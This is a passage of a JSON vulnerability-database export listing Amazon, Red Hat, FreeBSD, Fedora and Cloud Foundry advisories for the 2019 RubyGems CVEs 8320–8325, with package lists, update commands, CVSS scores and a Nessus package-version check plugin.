user's machine, presuming the attacker could guess at paths. Given how frequently gem is run as sudo, and how predictable paths are on modern systems (/tmp, /usr, etc.), this could likely lead to data loss or an unusable system.([CVE-2019-8320 __](<https://access.redhat.com/security/cve/CVE-2019-8320>))\n\nAn issue was discovered in RubyGems. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.([CVE-2019-8324 __](<https://access.redhat.com/security/cve/CVE-2019-8324>))\n\nAn issue was discovered in RubyGems. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.)([CVE-2019-8325 __](<https://access.redhat.com/security/cve/CVE-2019-8325>))\n\n \n**Affected Packages:** \n\n\nruby20, ruby21, ruby24\n\n \n**Issue Correction:** \nRun _yum update ruby20_ to update your system. \nRun _yum update ruby21_ to update your system. \nRun _yum update ruby24_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ruby20-libs-2.0.0.648-1.32.amzn1.i686 \n ruby20-debuginfo-2.0.0.648-1.32.amzn1.i686 \n rubygem20-bigdecimal-1.2.0-1.32.amzn1.i686 \n ruby20-devel-2.0.0.648-1.32.amzn1.i686 \n rubygem20-psych-2.0.0-1.32.amzn1.i686 \n rubygem20-io-console-0.4.2-1.32.amzn1.i686 \n ruby20-2.0.0.648-1.32.amzn1.i686 \n ruby21-2.1.9-1.22.amzn1.i686 \n rubygem21-bigdecimal-1.2.4-1.22.amzn1.i686 \n ruby21-debuginfo-2.1.9-1.22.amzn1.i686 \n rubygem21-io-console-0.4.3-1.22.amzn1.i686 \n ruby21-devel-2.1.9-1.22.amzn1.i686 \n rubygem21-psych-2.0.5-1.22.amzn1.i686 \n ruby21-libs-2.1.9-1.22.amzn1.i686 \n ruby24-2.4.5-1.30.11.amzn1.i686 \n rubygem24-json-2.0.4-1.30.11.amzn1.i686 \n rubygem24-bigdecimal-1.3.2-1.30.11.amzn1.i686 \n ruby24-debuginfo-2.4.5-1.30.11.amzn1.i686 \n rubygem24-io-console-0.4.6-1.30.11.amzn1.i686 \n rubygem24-psych-2.2.2-1.30.11.amzn1.i686 \n ruby24-libs-2.4.5-1.30.11.amzn1.i686 \n rubygem24-xmlrpc-0.2.1-1.30.11.amzn1.i686 \n ruby24-devel-2.4.5-1.30.11.amzn1.i686 \n \n noarch: \n ruby20-irb-2.0.0.648-1.32.amzn1.noarch \n ruby20-doc-2.0.0.648-1.32.amzn1.noarch \n rubygems20-devel-2.0.14.1-1.32.amzn1.noarch \n rubygems20-2.0.14.1-1.32.amzn1.noarch \n ruby21-irb-2.1.9-1.22.amzn1.noarch \n rubygems21-devel-2.2.5-1.22.amzn1.noarch \n ruby21-doc-2.1.9-1.22.amzn1.noarch \n rubygems21-2.2.5-1.22.amzn1.noarch \n rubygems24-2.6.14.3-1.30.11.amzn1.noarch \n rubygem24-did_you_mean-1.1.0-1.30.11.amzn1.noarch \n rubygems24-devel-2.6.14.3-1.30.11.amzn1.noarch \n ruby24-doc-2.4.5-1.30.11.amzn1.noarch \n ruby24-irb-2.4.5-1.30.11.amzn1.noarch \n \n src: \n ruby20-2.0.0.648-1.32.amzn1.src \n ruby21-2.1.9-1.22.amzn1.src \n ruby24-2.4.5-1.30.11.amzn1.src \n \n x86_64: \n ruby20-devel-2.0.0.648-1.32.amzn1.x86_64 \n rubygem20-bigdecimal-1.2.0-1.32.amzn1.x86_64 \n ruby20-debuginfo-2.0.0.648-1.32.amzn1.x86_64 \n rubygem20-io-console-0.4.2-1.32.amzn1.x86_64 \n ruby20-2.0.0.648-1.32.amzn1.x86_64 \n rubygem20-psych-2.0.0-1.32.amzn1.x86_64 \n ruby20-libs-2.0.0.648-1.32.amzn1.x86_64 \n rubygem21-psych-2.0.5-1.22.amzn1.x86_64 \n ruby21-devel-2.1.9-1.22.amzn1.x86_64 \n ruby21-libs-2.1.9-1.22.amzn1.x86_64 \n ruby21-debuginfo-2.1.9-1.22.amzn1.x86_64 \n rubygem21-bigdecimal-1.2.4-1.22.amzn1.x86_64 \n ruby21-2.1.9-1.22.amzn1.x86_64 \n rubygem21-io-console-0.4.3-1.22.amzn1.x86_64 \n rubygem24-json-2.0.4-1.30.11.amzn1.x86_64 \n ruby24-devel-2.4.5-1.30.11.amzn1.x86_64 \n ruby24-debuginfo-2.4.5-1.30.11.amzn1.x86_64 \n rubygem24-bigdecimal-1.3.2-1.30.11.amzn1.x86_64 \n rubygem24-io-console-0.4.6-1.30.11.amzn1.x86_64 \n ruby24-2.4.5-1.30.11.amzn1.x86_64 \n ruby24-libs-2.4.5-1.30.11.amzn1.x86_64 \n rubygem24-xmlrpc-0.2.1-1.30.11.amzn1.x86_64 \n rubygem24-psych-2.2.2-1.30.11.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2019-08-07T22:58:00", "published": "2019-08-07T22:58:00", "id": "ALAS-2019-1255", "href": "https://alas.aws.amazon.com/ALAS-2019-1255.html", "title": "Important: ruby20, ruby21, ruby24", "type": "amazon", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2020-11-10T12:36:34", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "**Issue Overview:**\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur. ([CVE-2019-8322 __](<https://access.redhat.com/security/cve/CVE-2019-8322>))\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur. ([CVE-2019-8323 __](<https://access.redhat.com/security/cve/CVE-2019-8323>))\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.) ([CVE-2019-8325 __](<https://access.redhat.com/security/cve/CVE-2019-8325>))\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check. ([CVE-2019-8324 __](<https://access.redhat.com/security/cve/CVE-2019-8324>))\n\n \n**Affected Packages:** \n\n\nruby\n\n \n**Issue Correction:** \nRun _yum update ruby_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n ruby-2.0.0.648-35.amzn2.0.1.aarch64 \n ruby-devel-2.0.0.648-35.amzn2.0.1.aarch64 \n ruby-libs-2.0.0.648-35.amzn2.0.1.aarch64 \n rubygem-bigdecimal-1.2.0-35.amzn2.0.1.aarch64 \n rubygem-io-console-0.4.2-35.amzn2.0.1.aarch64 \n rubygem-json-1.7.7-35.amzn2.0.1.aarch64 \n rubygem-psych-2.0.0-35.amzn2.0.1.aarch64 \n ruby-tcltk-2.0.0.648-35.amzn2.0.1.aarch64 \n ruby-debuginfo-2.0.0.648-35.amzn2.0.1.aarch64 \n \n i686: \n ruby-2.0.0.648-35.amzn2.0.1.i686 \n ruby-devel-2.0.0.648-35.amzn2.0.1.i686 \n ruby-libs-2.0.0.648-35.amzn2.0.1.i686 \n rubygem-bigdecimal-1.2.0-35.amzn2.0.1.i686 \n rubygem-io-console-0.4.2-35.amzn2.0.1.i686 \n rubygem-json-1.7.7-35.amzn2.0.1.i686 \n rubygem-psych-2.0.0-35.amzn2.0.1.i686 \n ruby-tcltk-2.0.0.648-35.amzn2.0.1.i686 \n ruby-debuginfo-2.0.0.648-35.amzn2.0.1.i686 \n \n noarch: \n rubygems-2.0.14.1-35.amzn2.0.1.noarch \n rubygems-devel-2.0.14.1-35.amzn2.0.1.noarch \n rubygem-rake-0.9.6-35.amzn2.0.1.noarch \n ruby-irb-2.0.0.648-35.amzn2.0.1.noarch \n rubygem-rdoc-4.0.0-35.amzn2.0.1.noarch \n ruby-doc-2.0.0.648-35.amzn2.0.1.noarch \n rubygem-minitest-4.3.2-35.amzn2.0.1.noarch \n \n src: \n ruby-2.0.0.648-35.amzn2.0.1.src \n \n x86_64: \n ruby-2.0.0.648-35.amzn2.0.1.x86_64 \n ruby-devel-2.0.0.648-35.amzn2.0.1.x86_64 \n ruby-libs-2.0.0.648-35.amzn2.0.1.x86_64 \n rubygem-bigdecimal-1.2.0-35.amzn2.0.1.x86_64 \n rubygem-io-console-0.4.2-35.amzn2.0.1.x86_64 \n rubygem-json-1.7.7-35.amzn2.0.1.x86_64 \n rubygem-psych-2.0.0-35.amzn2.0.1.x86_64 \n ruby-tcltk-2.0.0.648-35.amzn2.0.1.x86_64 \n ruby-debuginfo-2.0.0.648-35.amzn2.0.1.x86_64 \n \n \n", "edition": 1, "modified": "2019-07-18T18:14:00", "published": "2019-07-18T18:14:00", "id": "ALAS2-2019-1249", "href": "https://alas.aws.amazon.com/AL2/ALAS-2019-1249.html", "title": "Important: ruby", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:33", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby25-ruby (2.5.5). (BZ#1700274)\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\n* rubygems: Delete directory using symlink when decompressing tar (CVE-2019-8320)\n\n* rubygems: Escape sequence injection vulnerability in verbose (CVE-2019-8321)\n\n* rubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-05-13T12:53:03", "published": "2019-05-13T12:37:41", "id": "RHSA-2019:1148", "href": "https://access.redhat.com/errata/RHSA-2019:1148", "type": "redhat", "title": "(RHSA-2019:1148) Important: rh-ruby25-ruby security, bug fix, and enhancement update", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:14", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\n* rubygems: Delete directory using symlink when decompressing tar (CVE-2019-8320)\n\n* rubygems: Escape sequence injection vulnerability in verbose (CVE-2019-8321)\n\n* rubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nThis update fixes various bugs and adds enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.", "modified": "2019-06-11T09:30:42", "published": "2019-06-11T09:28:05", "id": "RHSA-2019:1429", "href": "https://access.redhat.com/errata/RHSA-2019:1429", "type": "redhat", "title": "(RHSA-2019:1429) Important: CloudForms 4.7.5 security, bug fix and enhancement update", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:56", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby24-ruby (2.4.6). (BZ#1700275)\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\n* rubygems: Delete directory using symlink when decompressing tar (CVE-2019-8320)\n\n* rubygems: Escape sequence injection vulnerability in verbose (CVE-2019-8321)\n\n* rubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-05-13T13:10:06", "published": "2019-05-13T13:00:24", "id": "RHSA-2019:1150", "href": "https://access.redhat.com/errata/RHSA-2019:1150", "type": "redhat", "title": "(RHSA-2019:1150) Important: rh-ruby24-ruby security, bug fix, and enhancement update", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2020-06-03T13:51:24", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\n* rubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-06-03T16:20:56", "published": "2019-05-15T21:11:12", "id": "RHSA-2019:1235", "href": "https://access.redhat.com/errata/RHSA-2019:1235", "type": "redhat", "title": "(RHSA-2019:1235) Important: ruby security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-30T13:55:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-16396", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\n* ruby: Tainted flags are not propagated in Array#pack and String#unpack with some directives (CVE-2018-16396)\n\n* rubygems: Escape sequence injection vulnerability in verbose (CVE-2019-8321)\n\n* rubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-06-30T15:52:04", "published": "2020-06-30T15:41:17", "id": "RHSA-2020:2769", "href": "https://access.redhat.com/errata/RHSA-2020:2769", "type": "redhat", "title": "(RHSA-2020:2769) Important: ruby security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:17", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8324"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-05-13T13:13:19", "published": "2019-05-13T13:02:13", "id": "RHSA-2019:1151", "href": "https://access.redhat.com/errata/RHSA-2019:1151", "type": "redhat", "title": "(RHSA-2019:1151) Important: rh-ruby23-ruby security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T10:20:16", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8324"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-08-07T19:20:59", "published": "2019-07-30T15:16:25", "id": "RHSA-2019:1972", "href": "https://access.redhat.com/errata/RHSA-2019:1972", "type": "redhat", "title": "(RHSA-2019:1972) Important: ruby:2.5 security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-06-09T16:41:42", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "\nRubyGems Security Advisories:\n\nCVE-2019-8320: Delete directory using symlink when decompressing tar\nCVE-2019-8321: Escape sequence injection vulnerability in 'verbose'\nCVE-2019-8322: Escape sequence injection vulnerability in 'gem owner'\nCVE-2019-8323: Escape sequence injection vulnerability in API response handling\nCVE-2019-8324: Installing a malicious gem may lead to arbitrary code execution\nCVE-2019-8325: Escape sequence injection vulnerability in errors\n\n", "edition": 2, "modified": "2019-03-05T00:00:00", "published": "2019-03-05T00:00:00", "id": "27B12D04-4722-11E9-8B7C-B5E01141761F", "href": "https://vuxml.freebsd.org/freebsd/27b12d04-4722-11e9-8b7c-b5e01141761f.html", "title": "RubyGems -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2019-05-10T01:35:27", "published": "2019-05-10T01:35:27", "id": "FEDORA:1F47A611D253", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: ruby-2.5.5-108.fc28", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2019-05-03T03:43:05", "published": "2019-05-03T03:43:05", "id": "FEDORA:63D6A607603A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: ruby-2.5.5-101.fc29", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-06-09T14:57:25", "bulletinFamily": "software", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 18.04\n\n# Description\n\nIt was discovered that Ruby incorrectly handled certain RubyGems. An attacker could possibly use this issue to execute arbitrary commands. (CVE-2019-8320)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An attacker could possibly use this issue to execute arbitrary code. (CVE-2019-8321, CVE-2019-8322, CVE-2019-8323, CVE-2019-8324, CVE-2019-8325)\n\nCVEs contained in this USN include: CVE-2019-8320, CVE-2019-8321, CVE-2019-8322, CVE-2019-8323, CVE-2019-8324, CVE-2019-8325\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.80.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.80.0 or later.\n\n# References\n\n * [USN-3945-1](<https://usn.ubuntu.com/3945-1>)\n * [CVE-2019-8320](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-8320>)\n * [CVE-2019-8321](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-8321>)\n * [CVE-2019-8322](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-8322>)\n * [CVE-2019-8323](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-8323>)\n * [CVE-2019-8324](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-8324>)\n * [CVE-2019-8325](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-8325>)\n", "edition": 2, "modified": "2019-04-12T00:00:00", "published": "2019-04-12T00:00:00", "id": "CFOUNDRY:1269D3F2131B2758F6111555E51EA48A", "href": "https://www.cloudfoundry.org/blog/usn-3945-1/", "title": "USN-3945-1: Ruby vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T02:36:34", "description": "RubyGems Security Advisories :\n\nCVE-2019-8320: Delete directory using symlink when decompressing tar\n\nCVE-2019-8321: Escape sequence injection vulnerability in 'verbose'\n\nCVE-2019-8322: Escape sequence injection vulnerability in 'gem owner'\n\nCVE-2019-8323: Escape sequence injection vulnerability in API response\nhandling\n\nCVE-2019-8324: Installing a malicious gem may lead to arbitrary code\nexecution\n\nCVE-2019-8325: Escape sequence injection vulnerability in errors", "edition": 18, "cvss3": {"score": 7.4, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2019-03-18T00:00:00", "title": "FreeBSD : RubyGems -- multiple vulnerabilities (27b12d04-4722-11e9-8b7c-b5e01141761f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ruby23-gems", "p-cpe:/a:freebsd:freebsd:ruby24-gems", "p-cpe:/a:freebsd:freebsd:ruby25-gems"], "id": "FREEBSD_PKG_27B12D04472211E98B7CB5E01141761F.NASL", "href": "https://www.tenable.com/plugins/nessus/122883", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122883);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/02/05\");\n\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n\n script_name(english:\"FreeBSD : RubyGems -- multiple vulnerabilities (27b12d04-4722-11e9-8b7c-b5e01141761f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"RubyGems Security Advisories :\n\nCVE-2019-8320: Delete directory using symlink when decompressing tar\n\nCVE-2019-8321: Escape sequence injection vulnerability in 'verbose'\n\nCVE-2019-8322: Escape sequence injection vulnerability in 'gem owner'\n\nCVE-2019-8323: Escape sequence injection vulnerability in API response\nhandling\n\nCVE-2019-8324: Installing a malicious gem may lead to arbitrary code\nexecution\n\nCVE-2019-8325: Escape sequence injection vulnerability in errors\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/rubygems/rubygems/blob/master/History.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/27b12d04-4722-11e9-8b7c-b5e01141761f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?430f1e1b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8320\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby23-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby24-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby25-gems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ruby23-gems<3.0.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby24-gems<3.0.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby25-gems<3.0.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2021-01-01T02:28:23", "description": "Rebase to latest minor version fixes CVE-2019-8320 CVE-2019-8321\nCVE-2019-8322 CVE-2019-8323 CVE-2019-8324 CVE-2019-8325\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, 